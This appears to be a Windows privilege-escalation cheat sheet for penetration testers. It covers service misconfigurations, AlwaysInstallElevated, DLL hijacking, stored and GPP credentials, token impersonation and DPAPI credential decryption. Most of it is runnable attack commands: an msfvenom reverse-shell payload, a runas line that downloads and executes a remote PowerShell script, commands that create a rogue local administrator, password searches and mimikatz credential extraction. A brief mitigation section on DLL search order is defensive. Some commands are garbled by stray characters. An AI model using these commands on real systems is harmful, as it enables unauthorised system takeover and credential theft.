Skip to content

Privilege Escalation

Options

  • Missing Patches
  • Automated Deployment and Auto Logon Passwords
  • AlwaysInstallElevated (any user can run MSI as SYSTEM)
  • Misconfigured Services

Guides

  • https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
  • Windows Privilege Escalation Fundamentals: http://www.fuzzysecurity.com/tutorials/16.html

Tools

  • https://github.com/pentestmonkey/windows-privesc-check/raw/master/windows-privesc-check2.exe
  • BeRoot: https://github.com/AlessandroZ/BeRoot/tree/master/Windows
  • Windows-Exploit-Suggester - https://github.com/GDSSecurity/Windows-Exploit-Suggester
  • Check Insecure Services: https://gist.github.com/wdormann/db533d84df57a70e9580a6a2127e33bb

Metasploit

In 32bit systems:

local_exploit_suggester

In 64bit systems:

search exploit/windows/local

PowerUp

PowerUp to check for all service misconfigurations:

Invoke-AllChecks

Service Unquoted Path

Get-ServiceUnquoted -Verbose

Get-WmiObject -Class win32_service | f` *

When service path is unquoted:

C:\PROGRAM FILES\SUB DIR\PROGRAM NAME

Areas we can place files for exploit are marked with *

C:\PROGRAM*FILES\SUB*DIR\PROGRAM*NAME

Examples:

c:\program.exe files\sub dir\program name
c:\program files\sub.exe dir\program name
c:\program files\sub dir\program.exe name

Service binary in a location writable to current user

Replace the binary to gain code execution.

Get-ModifiableServiceFile -Verbose

Service can be modified by current user

Get-ModifiableService -Verbose

Techniques

Service Unquoted Path

  • exploit/windows/local/trusted_service_path
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

Leads to running:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Program.exe
C:\Program Files (x86)\Program Folder\A.exe
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

Insecure Setup:

C:\Windows\System32>sc create "Vulnerable Service" binPath= "C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe" start=auto
C:\Windows\System32>cd C:\Program Files (x86)
C:\Program Files (x86)>mkdir "Program Folder\A Subfolder"
C:\Program Files (x86)>icacls "C:\Program Files (x86)\Program Folder" /grant Everyone:(OI)(CI)F /T

Folder & Service Executable Privileges

  • When new folders are created in the root it is writeable for all authenticated users by default. (NT AUTHORITY\Authenticated Users:(I)(M))
  • So any application that gets installed on the root can be tampered with by a non-admin user.
    • If binaries load with SYSTEM privileges from this folder it might just be a matter of replacing the binary with your own one.
  • https://msdn.microsoft.com/en-us/library/bb727008.aspx

If folder is writable, drop a exe and use "Service Unquoted Path" to execute:

icacls "C:\Program Files (x86)\Program Folder"

If service exe is writable to everyone, low privilege user can replace the exe with some other binary:

icacls example.exe

F = Full Control
CI = Container Inherit - This flag indicates that subordinate containers will inherit this ACE.
OI = Object Inherit - This flag indicates that subordinate files will inherit the ACE.

Service Permissions

  • exploit/windows/local/service_permissions

Approach 1 - Check permissions of service

subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service" /display

If service is editable, change the ImagePath to another exe.

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Vulnerable Service" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\testuser\AppData\Local\Temp\Payload.exe" /f

or create a local admin with:

sc config "Vulnerable Service" binpath="net user eviladmin P4ssw0rd@ /add
sc config "Vulnerable Service" binpath="net localgroup Administrators eviladmin /add"

Approach 2 - Check services a given user can edit

accesschk.exe -uwcqv "testuser" *

AlwaysInstallElevated

  • exploit/windows/local/always_install_elevated
[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer]
"AlwaysInstallElevated"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"AlwaysInstallElevated"=dword:00000001

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Installing MSI:

msiexec /quiet /qn /i malicious.msi

Payload Generation:

msfvenom -f msi-nouac -p windows/adduser USER=eviladmin PASS=P4ssw0rd@ -o add_user.msi

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.2.60 LPORT=8989 -f exe -o Payload.exe
msfvenom -f msi-nouac -p windows/exec cmd="C:\Users\testuser\AppData\Local\Temp\Payload.exe" > malicious.msi

Task Scheduler

  • On Windows 2000, XP, and 2003 machines, scheduled tasks run as SYSTEM privileges.
  • Works only on Windows 2000, XP, or 2003
  • Must have local administrator
> net start "Task Scheduler"
> time
> at 06:42 /interactive "C:\Documents and Settings\test\Local Settings\Temp\Payload.exe"

DLL Hijacking (DLL preloading attack or a binary planting attack)

  • https://msdn.microsoft.com/en-us/library/windows/desktop/ff919712(v=vs.85).aspx
  • Search order: https://msdn.microsoft.com/en-us/library/windows/desktop/ms682586(v=vs.85).aspx
When an application dynamically loads a dynamic-link library without specifying a fully qualified path name, Windows attempts to locate the DLL by searching a well-defined set of directories in a particular order, as described in Dynamic-Link Library Search Order.

The directory from which the application loaded.
The system directory.
The 16-bit system directory.
The Windows directory.
The current directory.
The directories that are listed in the PATH environment variable.
  • Services running under SYSTEM does not search through user path environment.

Identify processes / services - Use procman (https://technet.microsoft.com/en-us/sysinternals/processmonitor.aspx). - Filter Result = NAME NOT FOUND and Path ends with dll - Look at the registry key ServiceDll of services (Parameters).

Windows 7

IKE and AuthIP IPsec Keying Modules (IKEEXT) – wlbsctrl.dll
Windows Media Center Receiver Service (ehRecvr) – ehETW.dll
Windows Media Center Scheduler Service (ehSched) – ehETW.dll

Can run Media Center services over command line:

schtasks.exe /run /I /TN “\Microsoft\Windows\Media Center\mcupdate”
schtasks.exe /run /I /TN “\Microsoft\Windows\Media Center\MediaCenterRecoveryTask”
schtasks.exe /run /I /TN “\Microsoft\Windows\Media Center\ActivateWindowsSearch”

Windows XP

Automatic Updates (wuauserv) – ifsproxy.dll
Remote Desktop Help Session Manager (RDSessMgr) – SalemHook.dll
Remote Access Connection Manager (RasMan) – ipbootp.dll
Windows Management Instrumentation (winmgmt) – wbemcore.dll

Audio Service (STacSV) – SFFXComm.dll SFCOM.DLL
Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) – DriverSim.dll
Juniper Unified Network Service(JuniperAccessService) – dsLogService.dll
Encase Enterprise Agent – SDDisk.dll

Migrations

CWDIllegalInDllSearch
  • Allow user to change DLL search path algorithm
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
    CWDIllegalInDllSearch

1, 2 or ffffffff ?

The directory from which the application loaded
32-bit System directory (C:\Windows\System32)
16-bit System directory (C:\Windows\System)
Windows directory (C:\Windows)
[ dlls not loaded ] The current working directory (CWD)            
Directories in the PATH environment variable (system then user)
SetDllDirectory
  • Removes the current working directory (CWD) from the search order

SetDllDirectory(“C:\program files\MyApp\”) :

The directory from which the application loaded
[ added ] C:\program files\MyApp\                                    
32-bit System directory (C:\Windows\System32)
16-bit System directory (C:\Windows\System)
Windows directory (C:\Windows)
[ removed ] The current working directory (CWD)             
Directories in the PATH environment variable (system then user)

SetDllDirectory("")

The directory from which the application loaded
32-bit System directory (C:\Windows\System32)
16-bit System directory (C:\Windows\System)
Windows directory (C:\Windows)
[ removed ] The current working directory (CWD)
Directories in the PATH environment variable (system then user)
SafeDllSearchMode
  • Enabled by default
  • Can disable using [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
  • Calling the SetDllDirectory(“”) or SetDllDirectory(“C:\program files\MyApp\”) disables SafeDllSearchMode and uses the search order described for SetDllDirectory.
DEV
  • LoadLibraryEx (additional argument)
  • SetEnvironmentVariable(TEXT(“PATH”),NULL)
  • Change default installation folder to C:\Program Files
  • Fully qualified path when loading DLLs
  • Use SetDllDirectory(“”) API removing the current working directory from the search order
  • If software needs to be installed on the root check there are no binaries needing SYSTEM privileges
  • If SYSTEM privileges are required then change the ACL’s of the folder
  • Remove the path entry from the SYSTEM path variable if not needed

When enabled

The directory from which the application loaded
32-bit System directory (C:\Windows\System32)
16-bit System directory (C:\Windows\System)
Windows directory (C:\Windows)
The current working directory (CWD)           
Directories in the PATH environment variable (system then user)

When disabled

The directory from which the application loaded
[ moved up the list ] The current working directory (CWD)                   
32-bit System directory (C:\Windows\System32)
16-bit System directory (C:\Windows\System)
Windows directory (C:\Windows)   
Directories in the PATH environment variable (system then user)

Stored Credentials

C:\unattend.xml
C:\sysprep.inf
C:\sysprep\sysprep.xml

dir c:\*vnc.ini /s /b /c
dir c:\*ultravnc.ini /s /b /c
dir c:\ /s /b /c | findstr /si *vnc.ini
findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini

Unattended Installations

  • post/windows/gather/enum_unattend
  • Look for UserAccounts tag of Unattend.xml, sysprep.xml and sysprep.inf across the system, including:
C:\Windows\Panther\
C:\Windows\Panther\Unattend\
C:\Windows\System32\
C:\Windows\System32\sysprep\
  • Microsoft appends "Password" to all passwords within Unattend files before encoding them.

Group Policy Preferences (GPP)

  • Introduced from Windows Server 2008
  • GPP allows for configuration of Domain-attached machines via group policy.
  • GPPs are stored in the SYSVOL share, which is world-readable to authenticated users.
  • Domain machines periodically reach out and authenticate to the Domain Controller utilizing the Domain credentials of the logged-in user and pull down policies.
  • Group Policies for account management are stored on the Domain Controller in Groups.xml files buried in the SYSVOL folder
  • cpassword is used to set passwords for the Local Administrator account.

  • Password is AES encrypted using a published key: https://msdn.microsoft.com/en-us/library/Cc422924.aspx

  • Metasploit: post/windows/gather/credentials/gpp

  • PowerSploit: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1

Decrypt encrypted password:

gpp-decrypt $cpassword

Get-GPPPassword
Get-NetOU -GUID "{4C86DD57-4040-41CD-B163-58F208A26623}" | %{ Get-NetComputer -ADSPath $_ }
// All OUs connected to policy | List all domain machines tied to OU
  • Future - Local Administrator Password Solution (LAPS): https://www.microsoft.com/en-us/download/details.aspx?id=46899

Token Impersonation

PowerSploit / Incognito

List all tokens

Invoke-TokenManipulation -ShowAll

List all unique and usable tokens

Invoke-TokenManipulation -Enumerate

Start new process with token of a user

Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"

Start new process with token of another process

Invoke-TokenManipulation -CreateProcess "C:\Windown\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ProcessId 500

cmdkey

  • Creates, lists, and deletes stored user names and passwords or credentials.
  • Usable with "runas /savecred"
cmdkey /list

Run a command as admin:

runas /user:ACCESS\Administrator /savecred ​ "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')

Find all runas shortcuts:

Get-ChildItem​ ​ "C:\"​ *.lnk -Recurse -Force | ft fullname | ​ Out-File​ shortcuts.txt

ForEach​ ( ​ $file​ ​ in​ gc .\shortcuts.txt) { ​ Write-Output​ ​ $file​ ; gc ​ $file​ |
Select-String​ runas }

Windows Data Protection API

Locating credential files

cmd​ /c "​ dir​ /S /AS C:\Users\security\AppData\Local\Microsoft\Vault & ​ dir​ /S /AS
C:\Users\security\AppData\Local\Microsoft\Credentials & ​ dir​ /S /AS
C:\Users\security\AppData\Local\Microsoft\Protect & ​ dir​ /S /AS
C:\Users\security\AppData\Roaming\Microsoft\Vault & ​ dir​ /S /AS
C:\Users\security\AppData\Roaming\Microsoft\Credentials & ​ dir​ /S /AS
C:\Users\security\AppData\Roaming\Microsoft\Protect"

Transfer

[Convert]::ToBase64String([IO.File]::ReadAllBytes(​ "C:\Users\security\AppData\Roamin
g\Microsoft\Credentials\51AB168BE4BDB3A603DADE4F8CA81290"​ ))

[IO.File]::WriteAllBytes(​ "51AB168BE4BDB3A603DADE4F8CA81290"​ ,
[Convert]::FromBase64String(​ "AQAAAA4CAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALsOSB6
VI40+LQ9k9ZFkFgAAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAI
ABEAGEAdABhAA0ACgAAABBmAAAAAQAAIAAAAPW7usJAvZDZr308LPt/MB8fEjrJTQejzAEgOBNfpaa8AAAA
AA6AAAAAAgAAIAAAAPlkLTI/rjZqT3KT0C8m5Ecq3DKwC6xqBhkURY2t/T5SAAEAAOc1Qv9x0IUp+dpf+I7
c1b5E0RycAsRf39nuWlMWKMsPno3CIetbTYOoV6/xNHMTHJJ1JyF/4XfgjWOmPrXOU0FXazMzKAbgYjY+WH
hvt1Uaqi4GdrjjlX9Dzx8Rou0UnEMRBOX5PyA2SRbfJaAWjt4jeIvZ1xGSzbZhxcVobtJWyGkQV/5v4qKxd
lugl57pFAwBAhDuqBrACDD3TDWhlqwfRr1p16hsqC2hX5u88cQMu+QdWNSokkr96X4qmabp8zopfvJQhAHC
KaRRuRHpRpuhfXEojcbDfuJsZezIrM1LWzwMLM/K5rCnY4Sg4nxO23oOzs4q/ZiJJSME21dnu8NAAAAAY/z
BU7zWC+/QdKUJjqDlUviAlWLFU5hbqocgqCjmHgW9XRy4IAcRVRoQDtO4U1mLOHW6kLaJvEgzQvv2cbicmQ
=="​ ))

Extraction credential file -> masterkey (guidMasterKey) - https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials

dpapi::​ cred​ /​ in​ :51​ AB168BE4BDB3A603DADE4F8CA81290
/​ sid:S​ -1-5-21-953262931-566350628-63446256-1001 /​ password​ :4​ Cc3ssC0ntr0ller

Examine master key file

dpapi::​ masterkey​ /​ in​ :0792​ c32e​ -48​ a5​ -4​ fe3​ -8​ b43​ - ​ d93d64590580
/​ sid:S​ -1-5-21-953262931-566350628-63446256-1001 /​ password​ :4​ Cc3ssC0ntr0ller

Decrypt credential blob

dpapi::​ cred​ /​ in​ :51​ AB168BE4BDB3A603DADE4F8CA81290

Using Kernel Exploit

Installed updates:

wmic qfe get Caption,Description,HotFixID,InstalledOn

KiTrap0d

References

  • https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  • http://www.greyhathacker.net/?p=738
  • https://toshellandback.com/2015/11/24/ms-priv-esc
  • https://www.toshellandback.com/2015/08/30/gpp/